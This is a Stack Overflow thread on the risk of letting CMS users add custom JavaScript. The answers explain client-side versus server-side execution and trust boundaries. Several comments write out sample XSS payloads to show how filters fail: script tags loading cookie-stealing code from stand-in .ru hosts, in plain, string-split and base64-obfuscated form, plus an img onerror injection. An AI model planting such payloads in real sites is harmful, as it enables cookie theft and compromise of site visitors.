# Javascript: Can allowing custom javascript within a closed source CMS be bad?

Tags: javascript, jquery

There are a lot of features and abilities of javascript that I am unaware of.  I have developed a custom closed source CMS and I was thinking about adding a feature to allow for custom javascript that gets included on each page of their site (but not the backend system itself).  I was curious of the risk involved with doing this?  The CMS is built using PHP and there is javascript within the backend system of this CMS, but thats pretty much it.

If I allow custom javascript, can this be manipulated to retrieve all the php code, or to cause issues on the server itself?

I own the servers, so I can make any adjustments necessarily for safeguarding the server.

Again, this is purely for information and I appreciate any advice people can give me.

The javascript will be stored in a file and included using php on the page itself.  I do have code that blocks anything inside  to prevent the use of PHP within the code itself.

Comment: JavaScript is client side. PHP is server side. That means no JavaScript is getting executed until it reaches the user's browser. If the JavaScript is able to access your PHP from the user's browser, then they don't need JavaScript to retrieve your "closed source" CMS source code.

Comment: oh okay, thank you for that bit of information.  Very helpful.

Comment: Since you mention they can input HTML, does that mean they can add a `<script src="http://www.myhackerresource.ru/stealcookies.js"></script>` tag? As in, allow them to import absolutely any JavaScript they want pretty much without even using your JavaScript upload module.

Comment: I actually have a template engine that I designed that filters out `<?*****?>` and `<script***************</script>` out of the areas that they can enter text.  It replaces it with `''`.  If I ended up allowing the custom javascript module, i would bypass that for the module.  I'm thinking about doing an approval for javascript uploads before it makes it to the site.

Comment: Writing a template engine that successfully recognizes XSS attempts is **_extremely_** hard. Are you sure, for example, that your engine will recognize all the various permutations of "script"? (Think UTF8 character sets, HTML entities, and various other character obfuscation techniques.)

Comment: The next step I am doing is implementing htmlspecialchars() to the engine.  Will that handle all of the things you can think of as far as permutations go?

Comment: What if a script that you allow uploaded appends a `<script>` tag to the document? What if that consists of :`$(document.body).append('<' + 'sc' + 'ri' + 'pt sr' + 'c="ht' + 'tp:/' + '/mot' + 'herrus' + 'sia.' + 'ru/ha' + 'ck.j' + 's"></s' + 'cri' + 'pt>');` Can your template engine sniff that out?

Comment: okay so now I am probably not allowing javascript at all except if we build it for them.  But as far as the engine goes to prevent script's from being added to the html portion, would adding htmlspecialchars() prevent those permutations?

Comment: What if they've base64 encoded the string, and they wrap it in a function call: `$(document.body).append(base64decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9tb3RoZXJydXNzaWEucnUvaGFjay5qcyI+PC9zY3JpcHQ+"))`

Comment: No, `htmlspecialchars()` won't save you.

Comment: If you are allowing them to write JavaScript, then they could just upload the function for `base64decode`

Comment: I know, I mean now that you and everyone else have talked me out of allowing custom javascript.  I will do more research on blocking permutations of <script>, etc.  Thank you for your help :)

Comment: An easy way to run JavaScript when simple html is allowed is inserting an image: `<img src='image-that-doesnt-exist' onerror='alert("pwned")' />`. So if you don't want to allow JavaScript you should also consider replacing html with a template-engine of some kind.

Comment: You shouldn't be completely talked out of JavaScript. Let me submit an answer, and I'll explain what I mean.

Comment: Well the only 2 files that the users data goes into is .css files and .tpl files.  The .tpl files go through template engine, and the css just echo out.  Is this what you are referring to?

Comment: Try the sample code I just wrote and see if it gives you an alert. If the cms is on the same domain for all your users, you should also be aware that JavaScript gives users a way to obtain session-cookies if you use that. This way, an evil CMS-user can obtain another CMS-user's session-cookie if the user visits the evil user's site while logged in.

Comment: The CMS is located within each account/domain that uses it.  So there is no common CMS that all domains share.  And the same code will def. cause an alert because I hadn't even considered onclick and other ways to insert javascript.

Answer (score 5, accepted):

### Can they steal my closed-source PHP code with JavaScript?

To answer your first question, ***no***, your closed-source PHP code cannot be stolen by a user of your CMS software simply by uploading a JavaScript snippet.

This is because JavaScript runs on the client-side (the web browser).

If JavaScript is able to access your PHP code from the client-side, then they'd be able to access it without JavaScript. That would mean that you've configured something wrong on the web server side, like setting permissions on your files so that anyone can view them.

---

### Is allowing JavaScript to be uploaded by a CMS user a good idea?

You'll get some folks who will scream **ABSOLUTELY NOT UNDER ANY CIRCUMSTANCE**. These are the same people who say things like:

- Using `eval()` is always *evil*. It's not always evil, but it's almost always unnecessary.
- Using `global` or `$_GLOBALS` in PHP is *evil*. Again, it's only evil if you don't know what you are doing. And again, it's almost always unnecessary.

You should read that as a ***WARNING***. Don't treat this issue lightly, if you are careful, you can do it, but if you are not, it can really bite you in the a**. That's reason enough for most people to stay away from it.

Before you decide for sure if you should or shouldn't allow users of your CMS solution to upload JavaScript snippets, you should ask yourself the following question:

#### Who will be allowed to upload JavaScript snippets?

If the only people who have access to this feature of uploading JavaScript modules are trusted system administrators, then you should consider it *safe*. I put that in italics because it's not really safe, but it does, at that point, fall on these trusted users to ensure that they don't upload something malicious.

Maybe you get Mary Neophyte, webmaster(amateur) extraordinaire who decides she wants a cool scriptlet on her CMS front page that displays the current weather in Anchorage, Alaska. She goes to Google, types in *"JavaScript weather script"*, and arrives at Weather Channel. She decides their implementation is just too hard to install. She keeps looking. She arrives at Boris' Weather Script at [http:/motherrussia.ru/ilovehackingidiots/weatherscript.html](http://www.google.com).

***This isn't your fault*** when her CMS starts compromising her end users. She was the trusted administrator who uploaded a malicious script purposefully (though ignorantly). You shouldn't be held responsible for this type of behavior.

**Long story short,** you should be able to *trust* the **trusted** users of your CMS to be responsible enough to know what they are uploading. If they shoot themselves in the foot, that's not on you.

---

#### Allowing non-trusted users to upload JavaScript

This absolutely, positively, without a doubt is never something that you should do. It is impossible for you to screen every possible obfuscation that someone could upload.

I'm not even going to get into this further. Don't do it. Period.

---

#### Regarding HTML/CSS

Don't assume that malicious code can't make it onto your website via HTML/CSS. While HTML is much easier to sanitize than JavaScript, it can still be exploited to deliver undesired JavaScript to a page.

If you are only allowing **trusted users** to upload HTML/CSS, then don't worry too much about it. I stress again, It is Mary Neophyte's fault if she uploads Boris' Weather Script to her site. However, don't let Boris himself come to your website and start uploading anything that will get displayed on a web page to anyone but ol' Boris himself.

---

## TL;DR

I'll summarize everything into two rules:

1. Don't allow *untrusted* users to upload anything that will be displayed to anyone other than themselves.
2. Don't let anyone upload anything at all that gets executed server-side.

Comment: I really wish I could upvote this more than once.  You my friend are honestly one of my favorite people now on stack overflow.  You included more in your answer than I've ever gotten before on SO.  So, you have successfully made me feel more comfortable about using javascript, because it does only allow certain people (the people with permission) on their account to add/edit/remove javascript, html, and css.

Comment: I do have it already built in to prevent php (and I am going to work on more ways to help prevent php because I do agree that allowing users to do anything server side is terrible for all clients on that server, and terrible for the server itself.

Comment: So, just to clarify.  By allowing users to add javascript to their pages, only their pages are vulnerable right?  The server shouldn't be vulnerable (under normal situations).  I'm sure almost anything is possible, but just wanted to verify that bit of info.

Comment: Yes, JavaScript can't access anything server-side that they wouldn't be able to access without JavaScript. I would probably still put a big red box next to the upload JavaScript/HTML/CSS form that says to be sure what they are uploading is safe.

Comment: Well I am mainly referring to permformance of the server.  I apologize, should have clarified that more in detail

Comment: If they wanted to impact the performance of your server, uploading a malicious JavaScript wouldn't be the way they would do it.

Comment: Thank you so much for all your information and spending the time to fully answer and discuss the question rather than just dismissing it.  You are awesome.

Answer (score 1):

Allowing custom JavaScript would probably be a **very** bad idea. That would make your site vulnerable to cross-site scripting attacks and allow it to be a vector for cross-site request forgery attacks against other sites.

Comment: You're assuming that malicious users are the ones with access to uploading these JavaScript modules. I'm not saying that isn't the case.

Comment: It sounds like he meant that only authenticated users with authorization would have access to upload these JavaScript modules. Of course, that doesn't mean that their browser/computer isn't compromised.

Comment: Yes, only authorized users have access to add the javascript to their site.  This is not open for public access, for sure.  Now, malicious users who gain access to someones website does throw a kink in this.  Is there anything that can prevent cross-site scripting that I can implement onto the server?

Comment: How I am using this, in case it helps: Users can input html, and css into the design aspects of the CMS. And then, I was going to have a text editor that allowed them to enter custom javascript which writes their custom javascript to a file stored on the server. On page load (of pages their website, not the backend system), it will use a php include to include the javascript file they entered.

Comment: You're going to need to parse the uploaded HTML/JavaScript and screen it for code that could be used maliciously (even if it's not being used maliciously). That topic is much too large for StackOverflow.